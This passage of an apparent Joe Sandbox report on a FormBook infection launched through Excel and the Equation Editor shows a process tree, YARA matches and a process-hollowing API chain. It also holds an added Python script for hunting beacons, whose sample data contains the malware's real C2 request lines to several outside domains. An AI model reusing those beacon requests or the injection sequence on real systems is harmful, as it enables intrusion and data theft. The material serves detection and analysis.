33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 
32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#26085;&#26412;&#30127;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;</title><meta name="keywords" content="&#26085;&#26412;&#30127;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;" /><meta name="description" content="&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;,&#26085;&#26412;&#30127
Jan 13, 2022 20:23:23.537996054 CET | 519 | IN | Data Raw: 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 32 31
                                                  Data Ascii: ;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#25104;&#20154;&#21320;&#22812;&#31119;&#21033;&#35270;&#39057;&#32593;&#22336;,&#30007;&#22899;&#35064;&#20307;&#20570;&#29232;&#22270;&#29255;,&#23567;&#20044;&#37233;&#40657;&#3
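The four OUT requests in sessions 4 to 7 share one URI directory (/i5nb/), exactly two query parameters (the short token hPGx3Z=4ha06H5pmr repeated verbatim and a 72-character base64-looking blob under 7nqdxT7p, with the two parameters alternating order), "Connection: close", and a body of exactly seven NUL bytes, while the Host header changes on every request and three of the four servers answer with a stock hosting-provider 404 page. The script below is an added example, not part of the Joe Sandbox report and not code recovered from the sample; it encodes those traits as hunting logic over captured requests. The sample input is constructed from the request lines and Host headers above plus one hypothetical benign request for contrast; the thresholds (a 40-character minimum for the blob, 6 to 16 characters for the token) are assumptions chosen to fit this trace, not values taken from the malware.

```python
"""Flag FormBook-style HTTP beacons in a list of captured requests.

Illustrative detection logic written for this page. Traits checked are the
ones visible in the trace above: GET with two query parameters (one short
repeated token, one long base64-like blob), "Connection: close", a body of
seven NUL bytes, and the same path reused against different Host values.
"""
import re
from collections import defaultdict

# Long opaque value: base64 alphabet, 40+ chars, optional '=' padding (assumed threshold).
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# Short fixed token that repeats across beacons (assumed 6..16 chars).
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{6,16}$")
# "Data Raw: 00 00 00 00 00 00 00" in every OUT request of the trace.
NUL_BODY = b"\x00" * 7

# Constructed sample input: the four request lines and Host headers copied from
# sessions 4-7 above, plus one hypothetical benign request (www.example.com).
SAMPLE_REQUESTS = [
    ("GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1",
     {"Host": "www.terapiaholisticaemformacao.com", "Connection": "close"}, NUL_BODY),
    ("GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1",
     {"Host": "www.ecommerceoptimise.com", "Connection": "close"}, NUL_BODY),
    ("GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1",
     {"Host": "www.integratedheartspsychology.com", "Connection": "close"}, NUL_BODY),
    ("GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1",
     {"Host": "www.bjbwx114.com", "Connection": "close"}, NUL_BODY),
    ("GET /index.html?q=search&page=2 HTTP/1.1",
     {"Host": "www.example.com", "Connection": "keep-alive"}, b""),
]


def split_target(target):
    """Return (path, {name: value}) for a request target.

    Deliberately avoids urllib.parse.parse_qsl: it turns '+' into a space,
    which would corrupt the base64 blobs (they contain '+' and '/').
    """
    path, _, query = target.partition("?")
    params = {}
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        params[name] = value
    return path, params


def is_formbook_beacon(request_line, headers, body):
    """True when a single request shows every trait seen in the trace above."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET" or not parts[2].startswith("HTTP/1."):
        return False
    _, params = split_target(parts[1])
    if len(params) != 2:
        return False
    values = list(params.values())
    has_blob = any(BASE64ISH.match(v) for v in values)
    has_token = any(SHORT_TOKEN.match(v) for v in values)
    lower_headers = {k.lower(): v for k, v in headers.items()}
    return (has_blob and has_token
            and lower_headers.get("connection", "").lower() == "close"
            and body == NUL_BODY)


def hunt(requests):
    """Return (flagged, reused_paths).

    flagged      -- list of (host, path) for each request that looks like a beacon
    reused_paths -- {path: sorted hosts} for beacon paths sent to two or more
                    different Host values; the rotating Host is what gives the
                    pattern away even when each single request could pass as
                    an ordinary GET
    """
    flagged = []
    hosts_by_path = defaultdict(set)
    for request_line, headers, body in requests:
        if not is_formbook_beacon(request_line, headers, body):
            continue
        path, _ = split_target(request_line.split(" ")[1])
        host = headers.get("Host", "")
        flagged.append((host, path))
        hosts_by_path[path].add(host)
    reused = {p: sorted(h) for p, h in hosts_by_path.items() if len(h) >= 2}
    return flagged, reused


if __name__ == "__main__":
    flagged, reused = hunt(SAMPLE_REQUESTS)
    for host, path in flagged:
        print(f"beacon  {host}{path}")
    for path, hosts in reused.items():
        print(f"path {path} reused against {len(hosts)} hosts: {', '.join(hosts)}")
```

Run as-is it lists the four beacons and reports /i5nb/ as reused against four hosts; in practice the request tuples would come from a proxy log or Zeek http.log, and the path-reuse count is the signal worth alerting on, since any one of these domains on its own looks like a legitimate hosting customer.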


                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Memory Usage

                                                  High Level Behavior Distribution

                                                  Behavior

                                                  System Behavior

                                                  General

                                                  Start time:20:21:22
                                                  Start date:13/01/2022
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13ffd0000
                                                  File size:28253536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:21:46
                                                  Start date:13/01/2022
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:21:49
                                                  Start date:13/01/2022
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                  Imagebase:0x11a0000
                                                  File size:417792 bytes
                                                  MD5 hash:83AC585E99B527EEB278702F8F711568
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 44%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:21:52
                                                  Start date:13/01/2022
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\Public\vbc.exe
                                                  Imagebase:0x11a0000
                                                  File size:417792 bytes
                                                  MD5 hash:83AC585E99B527EEB278702F8F711568
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:20:21:55
                                                  Start date:13/01/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xffa10000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:20:22:08
                                                  Start date:13/01/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                  Imagebase:0x49d90000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                    Execution Graph

                                                    Execution Coverage:22.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.7%
                                                    Total number of Nodes:175
                                                    Total number of Limit Nodes:14

                                                    Graph

                                                    execution_graph (graph rendering omitted; recoverable content follows). Entry node 900bc0 leads via 9016a0, 901ab0 and 901ac0 into 901b10 and its sibling functions (901f6c, 9022cc, 901f89, 901ec7, 901f26, 902625, 902022, 9020e2, 9027d9, 901e13, 902272, 902031). The API nodes reachable from those functions are CreateProcessA (900728), VirtualAllocEx (900260/900268), ReadProcessMemory (9004e8/9004f0), WriteProcessMemory (900390), Wow64SetThreadContext (900130/900138) and ResumeThread (902ac0/902ad0).

                                                    Executed Functions

                                                    Control-flow Graph

                                                    (graph rendering omitted; basic blocks 2e03e4 through 2e4e21, with repeated calls to 2e0720 and calls to 2e4e28 and 2e4ef0)
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $!$8$?$@$@$@$N$N$R$R$R$p$p$p
                                                    • API String ID: 0-2934226087
                                                    • Opcode ID: f1c14d85aa47bef00079ccc7a5e6508f3da07e26613ab32bb83bab4fecf585f7
                                                    • Instruction ID: 17c5b754d291c58b0595b7ee675105fd019fd6d3e0d85b81b8fd2819d39bac5f
                                                    • Opcode Fuzzy Hash: f1c14d85aa47bef00079ccc7a5e6508f3da07e26613ab32bb83bab4fecf585f7
                                                    • Instruction Fuzzy Hash: AA13E334A10619CFC765DF34C894B9AB7B2BF8A304F5045ADD44AAB360DB75AE85CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    (graph rendering omitted; basic blocks 2e2cf8 through 2e4e21, with repeated calls to 2e0720 and calls to 2e4e28 and 2e4ef0)
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $!$8$?$@$@$@$N$N$R$R$R$p$p$p
                                                    • API String ID: 0-2934226087
                                                    • Opcode ID: dfb658c104533135ba103f100d8f435f215b27b17657359a0c0e7b375cd29629
                                                    • Instruction ID: c5d44dd4cf90b054ea7851aa0b52705df42534a4dfcbf52eea88d45936a7e3f6
                                                    • Opcode Fuzzy Hash: dfb658c104533135ba103f100d8f435f215b27b17657359a0c0e7b375cd29629
                                                    • Instruction Fuzzy Hash: EE13D230A11619CFC765DF34C894B9AB7B2BF8A304F5045ADD44AAB360DB75AE85CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    (graph rendering omitted; basic blocks 901b10 through 902893, with calls to 900728, 900390, 900130/900138 and 902ac0/902ad0)
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TDD
                                                    • API String ID: 0-1901089014
                                                    • Opcode ID: 4a636b07065e34e9c1e3423d9872ed5b03bc9323debe36a473a8ba8eef8d3670
                                                    • Instruction ID: 13e378249a00f884d7ed6f6b7bf9fcd7de7b7855a0d860d21b9e5ccaaabf04d1
                                                    • Opcode Fuzzy Hash: 4a636b07065e34e9c1e3423d9872ed5b03bc9323debe36a473a8ba8eef8d3670
                                                    • Instruction Fuzzy Hash: DDE1F074D042288FDB24DF65C888BEDBBB5AB89304F1085EAD449A7291EB749EC5CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009009EF
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID: TDD$TDD$TDD
                                                    • API String ID: 963392458-2240957677
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PS]p$PS]p
                                                    • API String ID: 0-3363070177
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PS]p$PS]p
                                                    • API String ID: 0-3363070177
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00900463
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009005A2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009005A2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00900312
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00900312
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
